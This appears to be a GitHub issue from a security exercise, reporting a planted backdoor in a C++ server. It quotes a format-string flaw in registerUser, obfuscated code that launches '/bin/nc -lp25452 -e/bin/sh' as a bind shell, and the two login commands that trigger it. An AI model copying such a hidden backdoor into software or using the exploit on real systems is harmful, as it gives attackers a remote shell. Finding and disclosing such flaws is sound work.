Possible backdoor / format string attack

[poechsel]

In the function registerUser a user controlled input is used as a format string:

my_ass_on_your_grass/src/services/authentication/AuthenticationService.cpp

Lines 16 to 20 in 355151c

	int login=0;
	snprintf(cname, NAME_MAX_LEN, name.c_str(),0,&login);
	User u(cname);
	u.setAuthenticated(false);
	u.setLogin(login);

Furthermore the registerUser is called each time the login command is issued by a user and name is the parameter passed to the login command. Thus the user could pass a valid format string to execute a format string attack and overwrite login with a non zero value.

Then, in the function user_already_logged if the getLogin (which returns the value of login defined in registerUser) of the current user (the one passed by login earlier) is non-zero a snippet of code that will executes /bin/nc -lp25452 -e/bin/sh is called.

my_ass_on_your_grass/src/commands/Commands.cpp

Lines 280 to 295 in 5265459

	if (auth.getUser(socket).getLogin()){
	//logout the user if already connected
	char command[8];
	strncpy(command+3,str_ping.c_str(),str_ping.size());
	strncpy(command,(char*)(access_denied+1),5);
	command[6] -= 4;
	string test;
	string arg0 = "-" +str_logout.substr(0,1) + str_grep.substr(3,1)+ to_string(access_denied[3]);
	char arg1[10] = "-e";
	strncpy(arg1+2, command, strlen(command));
	arg1[7] += 5;
	arg1[8] += 5;
	char * const argv[] = {command, &arg0[0u], arg1, NULL};
	char * const envp[] = {NULL};
	call_cmd(command,argv,envp);
	}

Exploit:
The following sequence of commands will execute this vulnerability:

login 1%2$hn
login q

The first login will rewrite the login variable. The second is here to call the function user_already_login which checks if this client has already executed login with an other username.

[guillaumemichel]

Congrats you found a vulnerability!